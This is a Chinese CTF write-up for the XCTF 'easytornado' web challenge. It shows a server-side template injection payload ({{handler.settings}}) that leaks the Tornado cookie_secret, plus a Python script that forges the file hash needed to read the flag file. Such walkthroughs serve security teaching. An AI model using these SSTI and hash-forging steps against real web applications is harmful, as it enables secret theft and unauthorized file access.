XCTF-Web-高手区-easytornado

题目

在这里插入图片描述

解题

1、访问url

在这里插入图片描述
点进去看看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、直接访问/fllllllllllllag文件

在这里插入图片描述
发现报错了,但我们发现URL中的Error是我们返回的Error,那么我们再来测试一下
在这里插入图片描述
在这里插入图片描述
发现可能存在SSTI漏洞,但被过滤了部分参数,所以不能使用

3、这里再回到题目信息easytornado,可以判断出可能是一个python的tornado漏洞

因为我没学过python的框架,就不详细解析了,只写payload
这里我们要访问/fllllllllllllag文件,并且还要filehash正确,那么我们目前的问题就是获取fllllllllllllag所对应的filehash的值
再由hints.txt可以可以看出,filehash的计算公式如下

md5(cookie_secret+md5(filename))

那么如何获取cookie_secret呢?我们这边直接上payload

http://111.200.241.244:51903/error?msg={{handler.settings}}

在这里插入图片描述
这时我们要访问的url是

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=md5(c3169c94-9dde-4d74-ab37-4300ced3cc8c+md5(/fllllllllllllag))

此时我们来计算filehash

# -*- coding: UTF-8 -*-
import hashlib

result = hashlib.md5()
result.update('/fllllllllllllag'.encode('utf-8'))
filename_md5 = result.hexdigest()
result = hashlib.md5()
result.update(('c3169c94-9dde-4d74-ab37-4300ced3cc8c' + filename_md5).encode('utf-8'))
print(result.hexdigest())

在这里插入图片描述

最终payload

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=0b2258f726a9bd96f61d7c3eef39ca0f

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值